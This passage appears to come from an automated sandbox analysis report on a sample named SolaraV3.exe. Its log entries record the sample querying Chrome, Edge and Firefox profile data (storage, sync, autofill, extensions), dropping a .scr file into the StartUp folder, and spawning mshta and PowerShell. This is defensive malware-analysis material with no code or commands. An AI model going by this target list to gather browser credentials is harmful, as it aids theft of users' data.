Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
